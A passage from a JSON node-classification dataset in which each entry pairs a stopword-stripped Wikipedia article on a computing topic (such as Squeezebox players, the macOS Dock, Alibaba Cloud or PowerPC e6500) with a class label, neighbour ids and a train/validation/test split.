administrators particular wanted something could minimize amount time needed day perform routine mundane tasks waste time expertise committed projects leading small team developers pedersen developed fasttrack scripting host simplify automate routine tasks system administrators resulting product definitely scripting language used intuitively like programming language without requiring users learn syntax concepts typically associated programming languages april 2010 fasttrack software entered agreement binary research international based city milwaukee united states market sell product globally fsh received windows pro community choice award 2012 first version produced june 2006 contained 51 components commands functions conditions collections making fasttrack following table summarizes dates components major releases companies organizations noaa kawasaki goodyear used implemented fasttrack scripting host",
    "neighbors": [
      9728,
      929,
      11683,
      3366,
      6797,
      9780,
      10518,
      1049,
      5435
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5288,
    "label": 0,
    "text": "National_Centre_for_Text_Mining:national centre text mining national centre text mining nactem publicly funded text mining tm centre established provide support advice information tm technologies disseminate information larger tm community also providing tailored services tools response requirements united kingdom academic community software tools services nactem supplies allow researchers apply text mining techniques problems within specific areas interest – examples tools highlighted addition providing services centre also involved makes significant contributions text mining research community nationally internationally initiatives europe pubmed central centre located manchester institute biotechnology operated organized university manchester school computer science nactem contributes expertise natural language processing information extraction including named-entity recognition extractions complex relationships events hold named entitites along parallel distributed data mining systems biomedical clinical applications termine domain independent method automatic term recognition used help locate important terms document automatically ranks acromine finds known expanded forms acronyms appeared medline entries conversely used find possible acronyms expanded forms previously appeared medline disambiguates medie intelligent search engine semantic retrieval sentences containing biomedical correlations medline abstracts facta+ medline search engine finding associations biomedical concepts facta+ visualizer web application aids understanding facta+ search results intuitive graphical visualisation kleio faceted semantic information retrieval system medline abstracts europe pmc evidencefinder europe pmc evidencefinder helps users explore facts involve entities interest within full text articles europe pubmed central database eupmc evidence finder anatomical entities meta-knowledge similar europe pmc evidencefinder allowing exploration facts involving anatomical entities within full text articles europe pubmed central database facts filtered according various aspects interpretation e.g. negation certainly level novelty info-pubmed provides information graphical representation biomedical interactions extracted medline using deep semantic parsing technology supplemented term dictionary consisting 200,000 protein/gene names identification disease types organisms ascot efficient semantically-enhanced search application customised clinical trial documents hom semantic search system historical medical document archives biolexicon large-scale terminological resource biomedical domain genia collection reference materials development biomedical text mining systems grec semantically annotated corpus medline abstracts intended training ie systems and/or resources used extract events biomedical literature corpus medline abstracts annotated experts metabolite enzyme names collection corpora manually annotated fine-grained species-independent anatomical entities facilitate development text mining systems carry detailed comprehensive analyses biomedical scientific text enrichment genia event corpus events enriched various levels information pertaining interpretation aim allow systems trained distinguish events factual information experimental analyses definite information speculated information etc objective argo project develop workbench analysing primarily annotating textual data workbench accessed web application supports combination elementary text-processing components form comprehensive processing workflows provides functionality manually intervene otherwise automatic process annotation correcting creating new annotations facilitates user collaboration providing sharing capabilities user-owned resources argo benefits users text-analysis designers providing integrated environment development processing workflows annotators/curators providing manual annotation functionalities supported automatic pre-processing post-processing developers providing workbench testing evaluating text analytics big mechanisms large explanatory models complicated systems interactions important causal effects whilst collection big data increasingly automated creation big mechanisms remains largely human effort becoming made increasingly challenging according fragmentation distribution knowledge ability automate construction big mechanisms could major impact scientific research one number different projects make big mechanism programme funded darpa aim assemble overarching big mechanism literature prior experiments utilise probabilistic interpretation new patient panomics data integrate machine reading cancer literature probabilistic reasoning across cancer claims using specially-designed ontologies computational modeling cancer mechanisms pathways automated hypothesis generation extend knowledge mechanisms 'robot scientist performs experiments test hypotheses repetitive cycle text mining modelling experimental testing worldview updating intended lead increased knowledge cancer mechanisms project aims produce knowledge repository philippine biodiversity combining domain-relevant expertise resources philippine partners text mining-based big data analytics university manchester national centre text mining repository synergy different types information e.g. taxonomic occurrence ecological biomolecular biochemical thus providing users comprehensive view species interest allow 1 carry predictive analysis species distributions 2 investigate potential medicinal applications natural products derived philippine species collaboration text-mining group european bioinformatics institute ebi mimas data centre forming work package europe pubmed central project formerly ukpmc hosted coordinated british library europe pmc whole forms european version pubmed central paper repository collaboration national institutes health nih united states europe pmc funded consortium key funding bodies biomedical research funders contribution major project application text mining solutions enhance information retrieval knowledge discovery application technology developed nactem projects large scale prominent resource biomedicine community project aims transform biodiversity heritage library bhl next-generation social digital library resource facilitate study discussion via social media integration legacy science documents biodiversity worldwide community raise awareness changes biodiversity time general public project integrates novel text mining methods visualisation crowdsourcing social media bhl resulting digital resource provide fully interlinked indexed access full content bhl library documents via semantically enhanced interactive browsing searching capabilities allowing users locate precisely information interest easy efficient manner project aims conduct novel research text mining machine learning transform way evidence-based public health ebph reviews conducted aims project develop new text mining unsupervised methods deriving term similarities support screening searching ebph reviews develop new algorithms ranking visualising meaningful associations multiple types dynamic iterative manner newly developed methods evaluated ebph reviews based implementation pilot ascertain level transformation ebph reviewing",
    "neighbors": [
      8440,
      4131,
      2059,
      7780
    ],
    "mask": "None"
  },
  {
    "node_id": 5289,
    "label": 6,
    "text": "Plumber_(program):plumber program plumber plan 9 bell labs inferno operating systems mechanism reliable uni- multicast inter-process communication formatted textual messages uses plan 9 network file protocol 9p rather special-purpose ipc mechanism number clients may listen named port file messages ports port routing defined plumbing rules rules dynamic listening program receives copy matching messages example data /sys/lib/plumb/basic plumbed standard rules sent edit port port write copy message listener case running editors interpret message file name open file plumber 9p file server provides service clients may use libplumb format messages since messages 9p network transparent",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 5290,
    "label": 2,
    "text": "Nokia_X7-00:nokia x7-00 nokia x7-00 symbian^3 smartphone nokia xseries first xseries phone nokia symbian^3 platform shipped anna update also successor x6 previous multimedia touchscreen phone similar features specifications series x7-00 announced 12 april 2011 alongside nokia e6 16 october 2018 hmd global announced new android smartphone china nokia x7 well known nokia 8.1 globally",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11271,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      1833,
      3626,
      10410,
      9137,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      737,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 5291,
    "label": 9,
    "text": "Squeezebox_(network_music_player):squeezebox network music player squeezebox network music player logitech squeezebox originally discontinued favor visually similar simplified logitech ue smart radio 2013 logitech added official menu option install squeezebox software smart radio effectively turning squeezebox radio slim devices established 2000 first known slimserver used streaming music launched hardware player named slimp3 able play streams 2001 although first player fairly simple supporting wired ethernet mp3 natively followed two years later slightly advanced player renamed squeezebox versions followed gradually adding native support additional file formats wi-fi-support gradually adding larger advanced displays well version targeting audiophile users support playing music external streaming platforms pandora napster last.fm sirius also added devices general two operating modes either standalone device connects internet streaming service directly local computer running logitech media server network-attached storage device server software large parts firmware recent players released open source licenses 2006 slim devices acquired logitech 20 million usd logitech continued development player announced august 2012 would discontinued online service mysqueezebox.com needed use squeezebox without private server still maintained logitech given cross-platform nature server software client users ensured continued use platform utilizing raspberry pi dedicated squeezebox device client server first-generation hardware requires logitech media server formerly slimserver squeezecenter squeezebox server run free open source software wired-ethernet natively supports one audio format mp3 logitech media server transcode audio formats mp3 fly using lame mp3 encoder second generation hardware also called sb1 avoid confusing squeezebox product range sb1 originally used display slimp3 main feature additions included optional 802.11b wi-fi support uncompressed pcm/wav/aiff audio streams headphone coaxial optical s/pdif outputs successor models required server may slimserver ended rev 6.5.4 squeezecenter rev 7.x logitech media server slim devices offered bitmap display upgrade hardware longer available units 40×2 noritake character display others 280×16 pixel noritake bitmap display third generation hardware features included optional 802.11g wi-fi native support audio formats flac wma ogg upgraded 320×32 pixel greyscale bitmap vfd display visualizers bitmapped fonts model infrared remote control analog outputs volume control headphone jack coaxial optical digital outputs squeezebox2 supports numerous audio formats including mp3 windows media audio musepack monkey audio apple lossless flac shorten wav aiff ogg vorbis unencrypted aac mp3 windows media flac wav aiff ogg vorbis natively supported player firmware remainder automatically transcoded logitech media server host software one player-supported formats drm-crippled aac apple itunes music store supported squeezebox classic aka squeezebox3 aka sb3 aka squeezebox 3rd generation fourth generation hardware features technical specifications identical squeezebox2 new board chassis design used well new remote internal wi-fi antennas introduction duet squeezebox3 renamed squeezebox classic transition logitech production sb3 available slim devices logitech housing dimensions 7.6 w × 3.7 h × 3.1 192 mm × 93 mm × 80 mm including stand fifth generation hardware features similar squeezebox v3 geared towards audiophiles additional features squeezebox v3 include dual 320×32 pixel displays front panel buttons tactile feedback knob redesigned backlit remote control balanced xlr unbalanced audio outputs balanced unbalanced digital inputs outputs aes/ebu s/pdif inputs operation standalone dac rs-232 serial connection external control infrared input output new design consists sophisticated remote called squeezebox controller aka sbc display like sonos separate simplified network music player box called squeezebox receiver aka sbr connecting stereo sbr operate without sbc although supported logitech recommended advanced users sbc also operate audio player integrated speaker integrated headphone jack additional sbrs could bought separately differences squeezebox classic squeezebox duet include squeezebox controller first unit squeezebox line runs squeezeos embedded linux distribution devices less slim previous squeezeboxes squeezebox radio squeezebox touch also squeezeos based squeezebox controller largely rendered obsolete smartphone tablet pc apps squeezebox touch surpasses squeezebox receiver respects squeezebox duet discontinued early 2011 departure previous models boom combines squeezebox functionality dsp 30 w integrated amplifier bi-amped stereo two-way speakers produce self-contained device requires network connection either wired wireless power without network connection boom still amplify play line level signal external player 3.5mm mini-jack plug squeezebox boom discontinued early 2011 replacement model squeezebox radio adds color screen 2.4 all-in-one design older sibling squeezebox boom mono configuration squeezebox radio powered optional proprietary battery pack made available march 2010 running logitech media server two squeezebox radios synchronized set play one stereo channel thus working stereo device also using headphones one use one single squeezebox radio stereo device squeezebox touch functional successor sb3 couple new features simplified interface limited functionality visually similar squeezebox radio interface option switch squeezebox firmware discontinued 2014",
    "neighbors": [
      10945,
      4675,
      7108,
      9163,
      753,
      5746,
      1974,
      5270,
      1849,
      4186,
      10270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5292,
    "label": 2,
    "text": "Dock_(macOS):dock macos dock prominent feature graphical user interface macos used launch applications switch running applications dock also prominent feature macos predecessor nextstep openstep operating systems earliest known implementations dock found operating systems risc os nextstep ios version dock iphone ipod touch ipad apple applied us patent design dock 1999 granted patent october 2008 nearly decade later application dragged dropped onto dock add dock application dragged dock remove except finder trash permanent fixtures leftmost rightmost items highest lowest items dock vertically oriented respectively part macos core services dock.app located /system/library/coreservices/ nextstep openstep dock application launcher holds icons frequently used programs icon workspace manager recycler always visible dock indicates program running showing ellipsis icon program running n't ellipsis icon macos running applications variously identified small black triangle mac os x 10.0-10.4 blue-tinted luminous dot mac os x 10.5-10.7 horizontal light bar os x 10.8 10.9 simple black white dot os x 10.10-present macos however dock used repository program file operating system hold number items resizes dynamically fit using magnification better view smaller items default appears bottom edge screen also instead placed left right edges screen user wishes applications normally keep icons dock still appear running remain quit features unlike dock next operating systems capacity dock dependent display resolution may attempt recover shelf functionality since macos inherits technology nextstep minimal shelf functionality implemented finder changes dock bring functionality also close apple newton os button bar found messagepad 2x00 series likes applications could dragged extras drawer finder-like app onto bar also screen put landscape mode user could choose position button bar right left side screen like dock macos macos dock also extended menus control applications without making visible screen applications simple options quit keep dock remove dock options though applications use menus purposes itunes uses menu way user control certain playback options applications include changing status online alias msn aim/ichat etc automatically saving changes made document current application feature made available macos docklings mac os x 10.4 earlier also opened using right-mouse button mouse one time either clicking holding control-click bring menu mac os x leopard docklings replaced stacks stacks stack files small organized folder dock opened left-clicking stacks could shown three ways fan grid list similar docklings grid view folders stack opened directly stack without need open finder ios dock used store applications since ios 4 folders containing applications unlike macos dock maximum 4 icons placed dock iphone ipod touch maximum ipad however 16 icons 13 apps 3 recently opened apps size dock ios changed application dock launched clicking jump software finished loading additionally application requires attention user jump even higher icon clicked user attends demands original version dock found mac os x public beta 10.0 presents flat white translucent interface aqua styled pinstripes dock found mac os x 10.1 tiger removes pinstripes otherwise identical mac os x leopard lion presents applications three-dimensional glassy surface perspective instead traditional flat one resembling sun microsystems project looking glass application dock os x mountain lion mavericks changes look resemble frosted glass rounded corners os x yosemite reverts two-dimensional appearance similar mac os x tiger although translucent blur effect iphone os 1 3 dock used metal look looks similar front mac pro ios 4 adopted dock design mac os x leopard lion used ios 7 uses similar dock mac os x tiger ios 7 styled blur effects ios 11 dock ipad redesigned resemble macos dock classic mac os dock-like application called launcher first introduced macintosh performa models 1993 later included part system 7.5.1 performs basic function also add-ons dragthing added dock users earlier versions microsoft implemented simplified dock feature windows 98 quick launch toolbar feature remained windows vista various docks also used linux bsd examples window maker emulates look feel nextstep gui docky avant window navigator kxdocker amongst others kde various gdesklet/adesklets docks afterstep wharf derivation nextstep ui itask ng module used enlightenment-based linux distributions gos blackbox slit bruce tognazzini usability consultant worked apple 1980s 1990s mac os x developed wrote article 2001 listing ten problems saw dock article updated 2004 removing two original criticisms adding new one one concerns dock uses much screen space another icons show labels pointer hovers similar-looking folders files windows difficult distinguish tognazzini also criticized fact icons dragged dock vanish easy way get back called behavior object annihilation john siracusa writing ars technica also pointed issues dock around releases mac os x public beta 2000 noted dock centered adding removing icons changes location icons review mac os x v10.0 following year also noted dock far many tasks optimum ease-of-use including launching apps switching apps opening files holding minimized windows siracusa criticized dock release mac os x v10.5 noting made less usable sake eye-candy siracusa criticized 3d look reflections faint blue indicator open applications less distinguishable files folders thom holwerda managing editor osnews stated concerns dock including facts grows directions holds trash icon persistent labels holwerda also criticized revised dock appearance mac os x v10.5",
    "neighbors": [
      9732,
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      8754,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      7307,
      8852,
      1686,
      7318,
      3228,
      7325,
      2207,
      1699,
      8877,
      1710,
      5294,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      708,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      6377,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      823,
      9529,
      1346,
      4933,
      9035,
      1878,
      4457,
      3948,
      6539,
      9100,
      9109,
      1439,
      9151,
      9665,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11251,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 5293,
    "label": 6,
    "text": "Comparison_of_file_systems:comparison file systems following tables compare general technical information number file systems",
    "neighbors": [
      5120,
      6148,
      2055,
      6153,
      10763,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      9762,
      5158,
      4151,
      3640,
      11323,
      8767,
      576,
      10303,
      8772,
      8774,
      10828,
      5709,
      1623,
      9308,
      10851,
      4708,
      9835,
      3692,
      7789,
      9836,
      5231,
      9840,
      9333,
      6263,
      2168,
      9335,
      3708,
      2172,
      639,
      9343,
      3722,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      4764,
      6309,
      1190,
      5286,
      10405,
      7344,
      178,
      3250,
      9907,
      2230,
      5816,
      1212,
      8380,
      4804,
      10951,
      8395,
      9420,
      8402,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      1253,
      9444,
      8938,
      1263,
      3312,
      9455,
      2290,
      2291,
      3826,
      246,
      3834,
      3323,
      3328,
      3841,
      11012,
      2314,
      1804,
      8461,
      6416,
      8976,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      8494,
      6961,
      819,
      1844,
      823,
      4409,
      11072,
      10051,
      3909,
      2378,
      4431,
      5969,
      2391,
      346,
      2395,
      2397,
      10590,
      10596,
      2407,
      6506,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      10623,
      7554,
      8075,
      7053,
      5013,
      11675,
      11676,
      414,
      2974,
      3488,
      7070,
      3496,
      4012,
      1454,
      6062,
      8110,
      11184,
      8114,
      2995,
      7603,
      1464,
      1978,
      2494,
      9665,
      8643,
      4548,
      9166,
      7126,
      2015,
      1509,
      9189,
      4074,
      7663,
      2545,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 5294,
    "label": 2,
    "text": "Shelf_(computing):shelf computing shelf interface feature nextstep openstep used repository store links commonly used files directories programs temporary holding place move/copy files directories around file system hierarchy macos items may dragged onto sidebar area finder behave placeholders manipulated manner dynamics shelf file system operations illustrated comparison metaphor used microsoft windows operating systems order move file following steps may taken next operating systems addition moving files dragging window window following method used note file dragged shelf moved anywhere changed way shelf icon merely placeholder file moving placeholder shelf actual action occurs next functionality builds upon concept allowing destination directory put shelf well file merely dragged destination directory icon process similar microsoft windows functionality copying cutting file system objects file files folder folders combination clipboard objects copied removed original location paste operation new location completed shelf concept though older powerful file system objects sources destinations persistent available long shelf windows cut copy paste metaphor objects locations persist one copy/move operation complete something else placed clipboard since shelf icons 'placeholders sorts icons put shelf representing commonly used directories commonly used programs put shelf well nextstep openstep file management application called fileviewer run workspace manager also allowed users different shelves associated particular directories users simply opened new browser rooted particular subdirectory browser window would show corresponding shelf allowing users many different shelves based whatever folder hierarchy happened using organize files",
    "neighbors": [
      7307,
      5292,
      6797,
      8505,
      7806
    ],
    "mask": "Train"
  },
  {
    "node_id": 5295,
    "label": 7,
    "text": "Alibaba_Cloud:alibaba cloud alibaba cloud also known aliyun chinese cloud computing company subsidiary alibaba group alibaba cloud provides cloud computing services online businesses alibaba e-commerce ecosystem alibaba cloud international operations registered headquartered singapore alibaba cloud offers cloud services services available pay-as-you-go basis include elastic compute data storage relational databases big-data processing anti-ddos protection content delivery networks cdn outside status largest cloud computing company china alibaba cloud operates 19 data center regions 56 availability zones around globe june 2017 alibaba cloud placed visionaries quadrant gartner magic quadrant cloud infrastructure service worldwide alibaba cloud 19 regional data centres globally including china north china south china east us west us east europe united kingdom middle east japan hong kong singapore australia malaysia india indonesia data center germany operated vodafone germany frankfurt certified c5 alibaba cloud provides cloud computing iaas paas saas including services e-commerce big data iot object storage oos kubernetes data customization managed alibaba web page using codice_1 command line tool 2017 alibaba cloud singapore university social sciences suss jointly launched university-accredited entrepreneurship program tertiary students",
    "neighbors": [
      11392,
      11530,
      1935,
      4388,
      10020,
      1705,
      4011,
      3376,
      6458,
      331,
      4429,
      7248,
      8914,
      467,
      8921,
      9181,
      354,
      4194,
      2409,
      8170,
      3819,
      10090
    ],
    "mask": "Test"
  },
  {
    "node_id": 5296,
    "label": 2,
    "text": "Departmental_boot_image:departmental boot image departmental boot image boot image computer enhanced adding applications passwords specific task group department organization many advantages thin client strategy done operating system base long boot device large enough accommodate boot applications together typical departmental windows xp boot image usually large requires dvd store may large network booting accordingly usually installed fixed removable hard drive kept inside machine rather installed network rom boot image control complexity total cost operations advantages using departmental boot image instead common boot image entire organization thin client disadvantages include complexity creating managing several large boot images determining department needs upgrade applications user allowed discipline soon degrades shop easier manage one consists one-off computers quirks frequently requiring re-imaging whose issues really diagnosable comparable experts believe departmental boot image regime degrades rather quickly state without extraordinary discipline controls advocate thin clients ensure control however increasingly possible restrict users installing applications standard boot image automatically re-install variant boot image detected would draconian large organization one boot image often quite acceptable boot image maintained departmental level users request upgraded minimum bureaucracy waiting",
    "neighbors": [
      5370,
      11108,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5297,
    "label": 3,
    "text": "PowerPC_e6500:powerpc e6500 powerpc e6500 multithreaded 64-bit power isa-based microprocessor core freescale semiconductor part nxp e6500 power entire range qoriq amp series system chip soc processors share common naming scheme txxxx hard samples manufactured 28 nm process available early 2012 full production later 2012 revised memory subsystem compared previous e5500 core four cores combined cpu cluster sharing large l2 cache e6500 cores supports eight cpu clusters large multiprocessing implementations core first multithreaded core designed freescale reintroduces enhanced version altivec products multithreading allows two virtual cores per hard core organized 2x2-way superscalar one virtual core e6500 often perform better entire e5500 core since freescale essentially duplicated lot logic instead virtualizing addition enhancements core core five integer units four simple one complex two load-store units one 128-bit altivec unit 32+32 kb instruction data l1 caches speeds range 2.5 ghz core designed highly configurable via corenet fabric meet specific needs embedded applications features like multi-core operation interface auxiliary application processing units apu e6501 core revision introduced 2013 enhanced virtualization interrupt support",
    "neighbors": [
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      6663,
      5642,
      3467,
      1548,
      1933,
      7302,
      6415,
      3472,
      4881,
      7305,
      2073,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      11314,
      11447,
      8120,
      8761,
      6715,
      9020,
      1725,
      1983,
      1985,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      342,
      9302,
      731,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      869,
      7269,
      10214,
      10985,
      9964,
      8048,
      3185,
      10224,
      4211,
      5235,
      630,
      3319,
      7286,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 5298,
    "label": 7,
    "text": "The_Linkup:linkup linkup formerly mediamax spin-off streamload nirvanix social network file sharing service let users send receive store large amounts data via web one first internet based storage services winning numerous awards one largest failures resulting user data loss june 15 2007 system administrator script accidentally misidentified deleted good data along dead data 3.5 million former user accounts files took october 2007 complete partial restore data much irretrievably lost linkup finally experienced meltdown july 10 2008 left 20,000 paying subscribers without digital music video photo files august 8 2008 site place message saying 're sorry mediamax linkup closed affiliate link competitor box.net",
    "neighbors": [
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 5299,
    "label": 5,
    "text": "Cn3D:cn3d cn3d windows macintosh unix-based software united states national library medicine acts helper application web browsers view three-dimensional structures national center biotechnology information entrez retrieval service simultaneously displays structure sequence alignment powerful annotation alignment editing features according official site cn3d public domain source code available",
    "neighbors": [
      576,
      5492,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 5300,
    "label": 4,
    "text": "Backup_and_Restore:backup restore backup restore formerly windows backup restore center component microsoft windows introduced windows vista included later versions allow users create backups restore backups created earlier replacement ntbackup included previous windows versions became deprecated feature windows 8 completely removed windows 8.1 favor file history however windows 10 re-incorporated operating system backup restore supports two different types backup file backup system image backup windows uses volume shadow copy service ensure files changed backed vss ensures file system-level consistency application-level consistency applications registered vss writers newer backup media cd dvd blu-ray discs supported backup restore windows backup service windows service responsible backup restore operation backup restore application however way interfacing service wbadmin command-line utility may also used entire disk individual files restored utility addition vhd file attached mounted separate disk regardless latest backup incremental full attached disk reflect state disk latest backup previous version feature exposing older backup sets image-based full-system backup option called complete pc backup windows vista system image windows 7 allows imaging entire system including operating system data volumes backed-up image later restored windows recovery environment either computer new computer different brand type file format used image-based backup vhd vhd image also mounted extracting individual files booted using windows 7 enterprise ultimate full-system image backup done beginning windows vista sp1 system images restored machine different motherboard may different disk controller machine must number disks volume shadow copy service also creates maintains periodic copies system user data local volume part system restore operation stores previous versions files incremental block-level changes automatically volume restored using system restore previous versions shell extension windows backup support tape drives also support backing restoring subfolder disk instead creates subfolders backup restore make system image disks ntfs file system system image saved usb flash drive must formatted ntfs file system version windows backup supplied windows server 2008 support hard disk drives large sector sizes 4096 bytes unless support 512 byte emulation features included backup restore may differ depending edition windows windows vista home premium business enterprise ultimate editions schedule automatic backups back files folders network location windows vista business enterprise ultimate editions support complete pc backup windows vista business edition support writing pc backup images dynamic drives e.g flash drives another notable limitation backup restore center windows vista allow users specify individual files folders backed skipped allows users choose file type categories based mime type application association file extension documents music videos etc limitation removed windows 7 windows vista complete pc backup could performed network location windows 7 allows performing full system image backup network location however subsequent incremental system image backups performed network image-based backups network must full backups full system image backups local removable storage incremental windows 7 file backup network share available windows 7 professional enterprise ultimate editions whereas included windows vista home premium manual image-based full system backup including incremental backup done local removable media windows 7 home premium full system backup network also requires windows 7 professional editions backup restore removed windows 8 windows server 2012 microsoft said program underused touting file history feature replace file-based backup access points removed except control panel applet called windows 7 file recovery windows 8.1 control panel applet removed functionality still available system image backup file history windows 8.1 system image backup function allow backing individual files folders libraries also users longer schedule backups gui although wbadmin tool still available used execute scheduled backups using task scheduler windows 10 backup restore control panel returned operating system known backup restore windows 7 part interface scheduling backups lost completely windows 8.1 made available non-system image file backups however program deprecated longer actively developed microsoft since windows 10 fall creators update",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      7739,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      9910,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      6396,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      3366,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      9025,
      3394,
      1358,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      6565,
      430,
      6062,
      10673,
      8627,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      7151,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 5301,
    "label": 9,
    "text": "CircuitLogix:circuitlogix circuitlogix software electronic circuit simulator uses pspice simulate thousands electronic devices models circuits circuitlogix supports analog digital mixed-signal circuits spice simulation gives accurate real-world results graphic user interface allows students quickly easily draw modify combine analog digital circuit diagrams circuitlogix first launched 2005 popularity grown quickly since time 2012 reached milestone 250,000 licensed users became first electronics simulation product global installed base quarter-million customers 100 countries circuitlogix developed dr. colin simpson electronics professor george brown college toronto canada john bud skinner computer programmer electronics program awards including award excellence association canadian community colleges accc professional version circuitlogix circuitlogix pro includes 10,000 device models well 8 virtual instruments also includes 3dlab software product combines interactive 3-dimensional learning environment electronic devices tools enhance user comprehension electronics 3dlab virtual components include batteries switches motors lamps resistors inductors capacitors instruments including oscilloscopes signal generators frequency counters fast accurate simulation electronic circuits essential provides information needed perform accurate analysis circuit behavior spice simulators used verify analog mixed-signal circuits yield expected outputs schematic netlist file circuit input values fed spice software simulates circuit behavior specified length time circuitlogix allows observation voltage current levels circuit node change frequency time allows obtaining accurate results even simulating complex circuits hierarchical blocks reused circuitlogix simulation engine based berkeley spice contains gui make circuit design easier efficient circuitlogix 32-bit spice engine interactive allowing example frequency sources changed potentiometers adjusted switches thrown simulation spice engine fully integrated schematic capture waveform tools circuitlogix passes schematic edits simulator automatically running components fuses leds controlled switches automatically updated schematic simulation runs circuitlogix simulates analog digital mixed analog-digital circuits simulator first divides circuit analog digital portions analog circuitry simulated time-step driven spice engine digital parts simulated separately event-driven simulation engine circuitlogix digital engine developed directly .net faster spice macros simulator automatically performs signal conversion possible connect analog digital part system ’ model library contains hybrid parts analog-to-digital digital-to-analog conversion circuitlogix mixed-mode schematic editor includes analog event-driven simulation capabilities simulation may contain components analog event driven digital sampled-data combination entire mixed signal analysis driven one integrated schematic digital models circuitlogix provide accurate specification propagation time rise/fall time delays event-driven algorithm used circuitlogix general-purpose supports non-digital types data example elements use real integer values simulate dsp functions sampled data filters event-driven algorithm faster standard spice matrix simulation time greatly reduced circuits use event-driven models place analog models mixed-mode simulation handled three levels circuitlogix primitive digital elements use timing models built-in 12-state digital logic simulator b subcircuit models use actual transistor topology integrated circuit finally c in-line boolean logic expressions two modeling techniques use spice solve problem third method digital primitives uses mixed-mode capability component library includes",
    "neighbors": [
      7819,
      6797,
      7983,
      3573,
      5881
    ],
    "mask": "None"
  },
  {
    "node_id": 5302,
    "label": 1,
    "text": "KeyBase:keybase keybase database web application managing deploying interactive taxonomic keys plants animals developed royal botanic gardens victoria keybase provides medium pathway keys traditionally developed print classical types media used effectively internet environment platform uses concept called keys easily linked together joined keys merged larger seamless keys groups still available browsed independently keys keybase database filtered displayed variety ways filters formats examples keybase database",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5303,
    "label": 8,
    "text": "Web_Single_Sign-On_Metadata_Exchange_Protocol:web single sign-on metadata exchange protocol web single sign-on metadata exchange protocol web services federated identity specification published microsoft sun microsystems defines mechanisms service query identity provider metadata concerning protocol suites supports goal operation increase ability given service interoperate given identity provider",
    "neighbors": [
      9665,
      10020,
      7878,
      1097,
      2013
    ],
    "mask": "None"
  },
  {
    "node_id": 5304,
    "label": 5,
